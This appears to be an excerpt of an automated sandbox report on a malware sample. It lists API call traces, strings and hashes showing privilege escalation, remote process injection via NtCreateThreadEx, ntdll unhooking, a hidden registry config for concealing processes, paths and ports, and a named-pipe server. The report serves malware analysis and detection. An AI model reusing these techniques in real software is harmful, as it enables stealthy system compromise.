• Instruction Fuzzy Hash: CF9109B6205B8096EB26CF62F8547DA73A9F78CB94F408125EB4A47B74DF78C549C700
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph

Memory Dump Source
• Source File: 00000016.00000002.2085757008.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_140000000_dllhost.jbxd
Similarity
• API ID: BoundaryDeleteDescriptorEnum$ModulesProcessProcesses
• String ID:
• API String ID: 330119047-0
• Opcode ID: b99cea897b55ce22ee55f00a709a12b981a6df01a8b7777c8743b117f59de58e
• Instruction ID: 722e7c41bd921b01580d5e9fcb7604c5b43dbddabd9dc005843a26f70c2221f1
• Opcode Fuzzy Hash: b99cea897b55ce22ee55f00a709a12b981a6df01a8b7777c8743b117f59de58e
• Instruction Fuzzy Hash: 6B5189B2711A809AEB66CF63A848BEA22A5F78DBC4F444025EF4A47768DF38C555C700
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph: function 14000165c (rendered graph and node listing not reproduced)

Memory Dump Source
• Source File: 00000016.00000002.2085757008.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_140000000_dllhost.jbxd
Similarity
• API ID: CreateNamedPipe
• String ID:
• API String ID: 2489174969-0
• Opcode ID: 62dafb1268ee9213ecbaf6c178ea5b5ed500df257eb2683acba7299805e1f63b
• Instruction ID: 5e84f6bf4889631b23437abf526e9bdf5af4b3ca6bd4e12e17f1e2086ffe5991
• Opcode Fuzzy Hash: 62dafb1268ee9213ecbaf6c178ea5b5ed500df257eb2683acba7299805e1f63b
• Instruction Fuzzy Hash: 7B414BB2615B50CAE761CF25E4807DD77B4F788B98F44522AFB4943BA8EB78C548CB40
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph

Memory Dump Source
• Source File: 00000016.00000002.2085757008.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_140000000_dllhost.jbxd
Similarity
• API ID: File$Create$ChangeCloseFindInformationMappingModuleNotificationViewlstrcmpi
• String ID:
• API String ID: 910215268-0
• Opcode ID: 2f1acf1cbdab51ed4474075f2a8db35881d4879a2f724898911980b73aff03a9
• Instruction ID: f2b1c273cdc5545e6e8c12de746a27ba9334337610d31b556cae7d200a6f3496
• Opcode Fuzzy Hash: 2f1acf1cbdab51ed4474075f2a8db35881d4879a2f724898911980b73aff03a9
• Instruction Fuzzy Hash: 3B5139B6305A8192EB22DF16B458BDA73A9FB8DBD8F044125EF4A037A4DF38C549C700
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph: function 140001584 (rendered graph and node listing not reproduced)

APIs
• GetTokenInformation.KERNELBASE(?,?,?,?,00000000,00000001400010A1), ref: 00000001400015C6
• GetTokenInformation.KERNELBASE(?,?,?,?,00000000,00000001400010A1), ref: 0000000140001609
Memory Dump Source
• Source File: 00000016.00000002.2085757008.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_140000000_dllhost.jbxd
Similarity
• API ID: InformationToken
• String ID:
• API String ID: 4114910276-0
• Opcode ID: bb1ede16d749b0aa8d49f68615aa5427a420d8c7a4dd9ca7b8525546133cb06c
• Instruction ID: 2eae3c48201e6f103262f764e10c79d14b5d21d5893c39f3542a132d265f3134
• Opcode Fuzzy Hash: bb1ede16d749b0aa8d49f68615aa5427a420d8c7a4dd9ca7b8525546133cb06c
• Instruction Fuzzy Hash: B52139B6204A8082EB12CF62F85479AB764FBCCBD4F448525EB8947B78DF79C545CB00
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph: function 140001ed0 (rendered graph and node listing not reproduced)

Memory Dump Source
• Source File: 00000016.00000002.2085757008.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_140000000_dllhost.jbxd
Similarity
• API ID: EnumProcesses
• String ID:
• API String ID: 84517404-0
• Opcode ID: 62dbe63adaa786fff5273d6083a5c992f197b0eddf441f0438fa731615d6977e
• Instruction ID: 3e335d43075e719169e469211f82513eafd9eb7e81d155af191f1dae7c0dcdef
• Opcode Fuzzy Hash: 62dbe63adaa786fff5273d6083a5c992f197b0eddf441f0438fa731615d6977e
• Instruction Fuzzy Hash: F2214AB6605A129BE716CF17B4547EAB6A6F7C9BD1F144028EB4607A78CF39D440CA40
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,?,?,000000014000103E), ref: 000000014000153B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2085757008.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_140000000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2591292051-0
                                                                                                                      • Opcode ID: 6bc9b99de388f3e59490879e904058593ad480db252299c408dbbe8cd014b142
                                                                                                                      • Instruction ID: 44c5bdf9c31fdf4bd35f48c43806700b171b0c8e6473a7c39bf54194b38a2f46
                                                                                                                      • Opcode Fuzzy Hash: 6bc9b99de388f3e59490879e904058593ad480db252299c408dbbe8cd014b142
                                                                                                                      • Instruction Fuzzy Hash: D2F03071705B8183EB16CF57B98439A6661E78CBC1F489139FB8A43768DF38C485C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000016.00000002.2085757008.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_22_2_140000000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: NamedPipe$ConnectCreate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2149227607-0
                                                                                                                      • Opcode ID: b4d669792a3cca6b1818fcb625241faabf3001f357681174e00ecfcf82171d6e
                                                                                                                      • Instruction ID: 32f579bea11482fe29c7866e40561744ab130bf1df4bedb027ae58d6efce7050
                                                                                                                      • Opcode Fuzzy Hash: b4d669792a3cca6b1818fcb625241faabf3001f357681174e00ecfcf82171d6e
                                                                                                                      • Instruction Fuzzy Hash: 5AF058B1204B4591EB16DF23F8143EA63A4AB8CBE0F588324BB6A436F4DF38C508C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:64%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:11.1%
                                                                                                                      Total number of Nodes:226
                                                                                                                      Total number of Limit Nodes:28

                                                                                                                      Callgraph

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,00401F85), ref: 00401B3D
                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,?,?,?,00401F85), ref: 00401B4A
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,?,?,?,?,00401F85), ref: 00401B5D
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00401B71
                                                                                                                      • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000), ref: 00401BA1
                                                                                                                      • GetLastError.KERNEL32 ref: 00401BAB
                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,00401F85), ref: 00401BBA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$OpenToken$AdjustChangeCloseCurrentErrorFindLastLookupNotificationPrivilegePrivilegesValue
                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                      • API String ID: 575374161-2896544425
                                                                                                                      • Opcode ID: a2f0ee75bb1a659cd0d3a2553357458e0cca49601e1686e4f397b873b149c109
                                                                                                                      • Instruction ID: 94f0b810e11bf8bc0d9ea5a63966bab554079aeeaeff7f5fb2edd46d5ef2bf77
                                                                                                                      • Opcode Fuzzy Hash: a2f0ee75bb1a659cd0d3a2553357458e0cca49601e1686e4f397b873b149c109
                                                                                                                      • Instruction Fuzzy Hash: 82011EB5A01219AFE7109FA59D89EAFBBBCEB04745F004075FA01F2295D774DF048BA8
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401A24: OpenProcess.KERNEL32(00001000,00000000,?,?,?,00000000,?,?,004015E7), ref: 00401A41
                                                                                                                        • Part of subcall function 00401A24: IsWow64Process.KERNEL32(00000000,?,?,004015E7), ref: 00401A52
                                                                                                                        • Part of subcall function 00401A24: FindCloseChangeNotification.KERNELBASE(00000000,?,004015E7), ref: 00401A68
                                                                                                                      • OpenProcess.KERNEL32(0000043A,00000000,?), ref: 004015FF
                                                                                                                      • NtQueryInformationProcess.NTDLL(00000000,0000001D,?,00000004,00000000), ref: 00401619
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004016F0
                                                                                                                        • Part of subcall function 00401A9B: OpenProcessToken.ADVAPI32(00000000,00000008,?,?), ref: 00401AAE
                                                                                                                        • Part of subcall function 00401A9B: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00401AC3
                                                                                                                        • Part of subcall function 00401A9B: GetLastError.KERNEL32 ref: 00401ACD
                                                                                                                        • Part of subcall function 00401A9B: LocalAlloc.KERNEL32(00000000,?,00000000), ref: 00401ADD
                                                                                                                        • Part of subcall function 00401A9B: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00401AF6
                                                                                                                        • Part of subcall function 00401A9B: GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00401B02
                                                                                                                        • Part of subcall function 00401A9B: GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00401B0F
                                                                                                                        • Part of subcall function 00401A9B: LocalFree.KERNEL32(00000000), ref: 00401B1E
                                                                                                                        • Part of subcall function 00401A9B: CloseHandle.KERNEL32(?), ref: 00401B28
                                                                                                                        • Part of subcall function 00401CD2: StrStrA.SHLWAPI(00000000,ReflectiveDllMain), ref: 00401D39
                                                                                                                      • VirtualAllocEx.KERNELBASE(00000000,00000000,?,00003000,00000040), ref: 0040166C
                                                                                                                      • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000), ref: 00401681
                                                                                                                        • Part of subcall function 00401A7C: GetModuleHandleA.KERNEL32(ntdll.dll,004016AA,?,001FFFFF,00000000,00000000,00002000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401A81
                                                                                                                        • Part of subcall function 00401A7C: GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 00401A91
                                                                                                                      • NtCreateThreadEx.NTDLL(?,001FFFFF,00000000,00000000,00002000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004016AA
                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000064), ref: 004016C2
                                                                                                                      • GetExitCodeThread.KERNEL32(?,?), ref: 004016D3
                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 004016E9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Close$HandleInformationOpenToken$AllocAuthorityChangeFindLocalNotificationThread$AddressCodeCountCreateErrorExitFreeLastMemoryModuleObjectProcQuerySingleVirtualWaitWow64Write
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2389754940-0
                                                                                                                      • Opcode ID: 8d352eb32a48a557f2ff996115c836c9804492d69efe05eb0cb64db553f73f09
                                                                                                                      • Instruction ID: 951545e82e6dc0c965935b179c794656d07d6bb01e9cf9b4bfb8f24a082405a0
                                                                                                                      • Opcode Fuzzy Hash: 8d352eb32a48a557f2ff996115c836c9804492d69efe05eb0cb64db553f73f09
                                                                                                                      • Instruction Fuzzy Hash: 93312571A01219BBDB109FE5CD84AAF7ABDAF44749F14457AF600F22A0D775DE00CA68
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401BEE
• SetEntriesInAclW.ADVAPI32(00000001,?,00000000,004021FE), ref: 00401C33
• LocalAlloc.KERNEL32(00000040,00000014), ref: 00401C41
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00401C50
• SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,004021FE,00000000), ref: 00401C61
• CreateNamedPipeW.KERNELBASE(\\.\pipe\$sxrchildproc34226543a32,00000003,00000000,000000FF,00000400,00000400,00000000,?), ref: 00401C8D
Strings
• \\.\pipe\$sxrchildproc34226543a32, xrefs: 00401C89
Memory Dump Source
• Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
Similarity
• API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
• String ID: \\.\pipe\$sxrchildproc34226543a32
• API String ID: 3197395349-4098291161
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetProcessHeap.KERNEL32(00000000,00000020,74DF2E90,74DF0F10,74DEF380,?,?,?,?,?,0040207F), ref: 00401385
• HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040207F), ref: 0040138C
  • Part of subcall function 0040115E: GetProcessHeap.KERNEL32(00000000,00000010,00000000,00401399,?,?,?,?,?,0040207F), ref: 00401163
  • Part of subcall function 0040115E: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040207F), ref: 0040116A
  • Part of subcall function 0040115E: GetProcessHeap.KERNEL32(00000000,00000040,?,?,?,?,?,0040207F), ref: 00401187
  • Part of subcall function 0040115E: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040207F), ref: 0040118E
  • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,0000000C,00000000,004013A0,?,?,?,?,?,0040207F), ref: 00401005
  • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040207F), ref: 0040100C
  • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000040,?,?,?,?,?,0040207F), ref: 00401022
  • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040207F), ref: 00401029
• RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\$sxrconfig,00000000,00020119,?,?,?,?,?,?,0040207F), ref: 004013ED
• RegOpenKeyExW.ADVAPI32(?,startup,00000000,00020019,?,?,?,?,?,?,0040207F), ref: 00401409
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,0040207F), ref: 00401424
  • Part of subcall function 00401036: RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00401546,00000000,00000000,00000000,00000000,75A8EB20,00000000,75A8E9B0), ref: 0040105A
  • Part of subcall function 00401036: RegEnumValueW.ADVAPI32(?,00000000,?,00000064,00000000,?,?,?), ref: 0040109A
  • Part of subcall function 00401036: GetProcessHeap.KERNEL32(00000000,00402119), ref: 004010D8
  • Part of subcall function 00401036: HeapAlloc.KERNEL32(00000000), ref: 004010DF
  • Part of subcall function 00401036: GetProcessHeap.KERNEL32(00000000,?), ref: 00401101
  • Part of subcall function 00401036: HeapFree.KERNEL32(00000000), ref: 00401108
• RegOpenKeyExW.ADVAPI32(?,pid,00000000,00020019,?,?,?,?,?,?,0040207F), ref: 00401439
• RegCloseKey.KERNELBASE(?,?,?,?,?,?,0040207F), ref: 0040144D
• RegOpenKeyExW.ADVAPI32(?,process_names,00000000,00020019,0040207F,?,?,?,?,?,0040207F), ref: 00401462
• RegCloseKey.ADVAPI32(0040207F,?,?,?,?,?,0040207F), ref: 00401478
• RegOpenKeyExW.ADVAPI32(?,paths,00000000,00020019,?,?,?,?,?,?,0040207F), ref: 0040148D
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,0040207F), ref: 004014A3
• RegOpenKeyExW.ADVAPI32(?,service_names,00000000,00020019,?,?,?,?,?,?,0040207F), ref: 004014B8
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,0040207F), ref: 004014CE
• RegOpenKeyExW.ADVAPI32(?,tcp_local,00000000,00020019,?,?,?,?,?,?,0040207F), ref: 004014E3
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,0040207F), ref: 004014F7
• RegOpenKeyExW.ADVAPI32(?,tcp_remote,00000000,00020019,?,?,?,?,?,?,0040207F), ref: 0040150C
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,0040207F), ref: 00401520
• RegOpenKeyExW.ADVAPI32(?,udp,00000000,00020019,?,?,?,?,?,?,0040207F), ref: 00401535
  • Part of subcall function 0040119B: RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,004014CA,00000000,00000000,00000000,00000000,75A8EB20,75A8E9B0), ref: 004011BE
  • Part of subcall function 0040119B: GetProcessHeap.KERNEL32(00000000,0000020A,00000000), ref: 004011D3
  • Part of subcall function 0040119B: HeapAlloc.KERNEL32(00000000), ref: 004011DA
  • Part of subcall function 0040119B: RegEnumValueW.ADVAPI32(?,00000000,?,00000064,00000000,?,00000000,?), ref: 00401213
  • Part of subcall function 0040119B: StrCmpIW.SHLWAPI(?,00000000), ref: 0040123E
  • Part of subcall function 0040119B: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401276
  • Part of subcall function 0040119B: HeapFree.KERNEL32(00000000), ref: 0040127D
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,0040207F), ref: 00401549
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,0040207F), ref: 0040154E
Strings
Memory Dump Source
• Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
Similarity
• API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValue
• String ID: SOFTWARE\$sxrconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 3905038499-3028563969
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 00401DD3: StrCpyW.SHLWAPI ref: 00401E03
  • Part of subcall function 00401DD3: StrCatW.SHLWAPI ref: 00401E12
  • Part of subcall function 00401DD3: GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00401E19
  • Part of subcall function 00401DD3: GetCurrentProcess.KERNEL32(00000000,?,0000000C), ref: 00401E3E
  • Part of subcall function 00401DD3: K32GetModuleInformation.KERNEL32(00000000), ref: 00401E45
  • Part of subcall function 00401DD3: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401E69
  • Part of subcall function 00401DD3: CreateFileMappingW.KERNELBASE(00000000,00000000,01000002,00000000,00000000,00000000), ref: 00401E87
  • Part of subcall function 00401DD3: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000), ref: 00401E9E
  • Part of subcall function 00401DD3: lstrcmpiA.KERNEL32(00401F6B,.text), ref: 00401EDC
  • Part of subcall function 00401DD3: FindCloseChangeNotification.KERNELBASE(?), ref: 00401F34
  • Part of subcall function 00401988: VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000003), ref: 004019D6
  • Part of subcall function 00401988: VerSetConditionMask.NTDLL(00000000), ref: 004019DA
  • Part of subcall function 00401988: VerSetConditionMask.NTDLL(00000000), ref: 004019DE
  • Part of subcall function 00401988: VerifyVersionInfoW.KERNEL32 ref: 004019EB
• FindResourceA.KERNEL32(00000000,00000065,DLL), ref: 00401F8F
• SizeofResource.KERNEL32(00000000,00000000), ref: 00401FA1
• LoadResource.KERNEL32(00000000,00000000), ref: 00401FB6
• LockResource.KERNEL32(00000000), ref: 00401FC5
• GetCurrentProcessId.KERNEL32 ref: 00401FD6
• RegCreateKeyExW.KERNELBASE(?,pid,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 00402001
• GetCurrentProcessId.KERNEL32 ref: 00402011
• RegSetValueExW.KERNELBASE(?,svc32,00000000,00000004,?,00000004), ref: 00402027
• RegCloseKey.KERNELBASE(?), ref: 00402030
• RegCloseKey.ADVAPI32(?), ref: 00402035
• CreateThread.KERNELBASE(00000000,00000000,004021ED,0040210E,00000000,00000000), ref: 0040204B
• GetProcessHeap.KERNEL32(00000000,00000008), ref: 00402056
• HeapAlloc.KERNEL32(00000000), ref: 00402059
• CreateThread.KERNELBASE(00000000,00000000,00402144,00000000,00000000,00000000), ref: 00402078
• ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 0040209C
  • Part of subcall function 00401DD3: VirtualProtect.KERNEL32(?,32F4B90A,00000040,?), ref: 00401F0C
  • Part of subcall function 00401DD3: VirtualProtect.KERNEL32(?,32F4B90A,?,?), ref: 00401F29
  • Part of subcall function 00401DD3: CloseHandle.KERNEL32(00000000), ref: 00401F3B
  • Part of subcall function 00401DD3: FreeLibrary.KERNEL32(00000000), ref: 00401F43
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 004020F4
• HeapFree.KERNEL32(00000000), ref: 004020F7
• Sleep.KERNELBASE(00000064), ref: 004020FF
Strings
Memory Dump Source
• Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
Similarity
• API ID: CreateProcess$CloseHeapResource$ConditionCurrentFileMask$FindFreeHandleModuleProtectThreadVirtual$AllocChangeExecuteInfoInformationLibraryLoadLockMappingNotificationShellSizeofSleepValueVerifyVersionViewlstrcmpi
• String ID: DLL$kernel32.dll$ntdll.dll$open$pid$svc32
• API String ID: 2281104129-3373353123
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 004019FA: GetCurrentProcess.KERNEL32(?,ntdll.dll,ntdll.dll,?,00401DEC), ref: 00401A08
  • Part of subcall function 004019FA: IsWow64Process.KERNEL32(00000000,?,00401DEC), ref: 00401A0F
• StrCpyW.SHLWAPI ref: 00401E03
• StrCatW.SHLWAPI ref: 00401E12
• GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00401E19
• GetCurrentProcess.KERNEL32(00000000,?,0000000C), ref: 00401E3E
• K32GetModuleInformation.KERNEL32(00000000), ref: 00401E45
• CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401E69
• CreateFileMappingW.KERNELBASE(00000000,00000000,01000002,00000000,00000000,00000000), ref: 00401E87
• MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000), ref: 00401E9E
• lstrcmpiA.KERNEL32(00401F6B,.text), ref: 00401EDC
• VirtualProtect.KERNEL32(?,32F4B90A,00000040,?), ref: 00401F0C
• VirtualProtect.KERNEL32(?,32F4B90A,?,?), ref: 00401F29
• FindCloseChangeNotification.KERNELBASE(?), ref: 00401F34
• CloseHandle.KERNEL32(00000000), ref: 00401F3B
• FreeLibrary.KERNEL32(00000000), ref: 00401F43
Strings
Memory Dump Source
• Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
Similarity
• API ID: FileProcess$CloseCreateCurrentHandleModuleProtectVirtual$ChangeFindFreeInformationLibraryMappingNotificationViewWow64lstrcmpi
• String ID: .text$C:\Windows\SysWOW64\$C:\Windows\System32\$ntdll.dll
• API String ID: 3518538039-4096225029
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 122 4016fd-40175f GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 123 401765-401770 122->123 124 401879-4018a6 GetProcessHeap HeapFree GetProcessHeap RtlFreeHeap 122->124 125 401776-401779 123->125 126 401877 123->126 127 40177c-401790 OpenProcess 125->127 126->124 128 401796-4017ab K32EnumProcessModules 127->128 129 40186d-401871 127->129 130 4017b1-4017be 128->130 131 401866-401867 FindCloseChangeNotification 128->131 129->126 129->127 132 401863 130->132 133 4017c4-4017e1 ReadProcessMemory 130->133 131->129 132->131 134 4017e3-4017f2 133->134 135 401806-40180a 133->135 136 4017f4-4017fc 134->136 137 40180e-401816 134->137 135->133 138 40180c 135->138 136->137 139 4017fe-401804 136->139 138->132 139->135 139->137 140 401818-401830 137->140 141 40185f 137->141 141->132 142 401840-40184b 140->142 143 401832-40183e 140->143 144 40184e-40185d 142->144 143->144 144->132
APIs
• GetProcessHeap.KERNEL32(00000000,00009C40,74DF2E90,00000000,00000000), ref: 00401720
• HeapAlloc.KERNEL32(00000000), ref: 0040172D
• GetProcessHeap.KERNEL32(00000000,00009C40), ref: 0040173B
• HeapAlloc.KERNEL32(00000000), ref: 00401742
• K32EnumProcesses.KERNEL32(004018DB,00009C40,?), ref: 00401757
• OpenProcess.KERNEL32(00000410,00000000,004018DB), ref: 00401786
• K32EnumProcessModules.KERNEL32(00000000,?,00009C40,?), ref: 004017A3
• ReadProcessMemory.KERNEL32(00000000,?,?,00000200,00000000), ref: 004017D9
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401867
• GetProcessHeap.KERNEL32(00000000,004018DB), ref: 0040187B
• HeapFree.KERNEL32(00000000), ref: 00401888
• GetProcessHeap.KERNEL32(00000000,?), ref: 0040188E
• RtlFreeHeap.NTDLL(00000000), ref: 00401895
Memory Dump Source
• Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFree$ChangeCloseFindMemoryModulesNotificationOpenProcessesRead
• String ID:
• API String ID: 2178662837-0
• Opcode ID: 06d371d356d1a68a379f45de22ab422bdb666e2b089f0b1cd932ea4aafa399ab
• Instruction ID: f944c13f248919bbff2ebf0d05b4004713a15aee8a1618dc714bfd3de059199b
• Opcode Fuzzy Hash: 06d371d356d1a68a379f45de22ab422bdb666e2b089f0b1cd932ea4aafa399ab
• Instruction Fuzzy Hash: 3A513E71E01219ABDB11DFA5CD84AAFBBB8FF48701F10846AE545B7290D778EB40CB64
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 152 4021ed-4021f3 153 4021f4-402203 call 401bc6 152->153 156 402205-40220d Sleep 153->156 157 40220f-40221a ConnectNamedPipe 153->157 156->153 158 402253-402255 Sleep 157->158 159 40221c-402231 ReadFile 157->159 161 40225b-402262 DisconnectNamedPipe 158->161 160 402233-402251 WriteFile 159->160 159->161 160->161 161->157
APIs
  • Part of subcall function 00401BC6: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401BEE
  • Part of subcall function 00401BC6: SetEntriesInAclW.ADVAPI32(00000001,?,00000000,004021FE), ref: 00401C33
  • Part of subcall function 00401BC6: LocalAlloc.KERNEL32(00000040,00000014), ref: 00401C41
  • Part of subcall function 00401BC6: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00401C50
  • Part of subcall function 00401BC6: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,004021FE,00000000), ref: 00401C61
  • Part of subcall function 00401BC6: CreateNamedPipeW.KERNELBASE(\\.\pipe\$sxrchildproc34226543a32,00000003,00000000,000000FF,00000400,00000400,00000000,?), ref: 00401C8D
• Sleep.KERNEL32(00000001), ref: 00402207
• ConnectNamedPipe.KERNELBASE(00000000,00000000), ref: 00402212
• ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 00402229
• WriteFile.KERNEL32(00000000,0000004D,00000001,?,00000000), ref: 0040224B
• Sleep.KERNEL32(00000001), ref: 00402255
• DisconnectNamedPipe.KERNEL32(00000000), ref: 0040225C
Memory Dump Source
• Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
Similarity
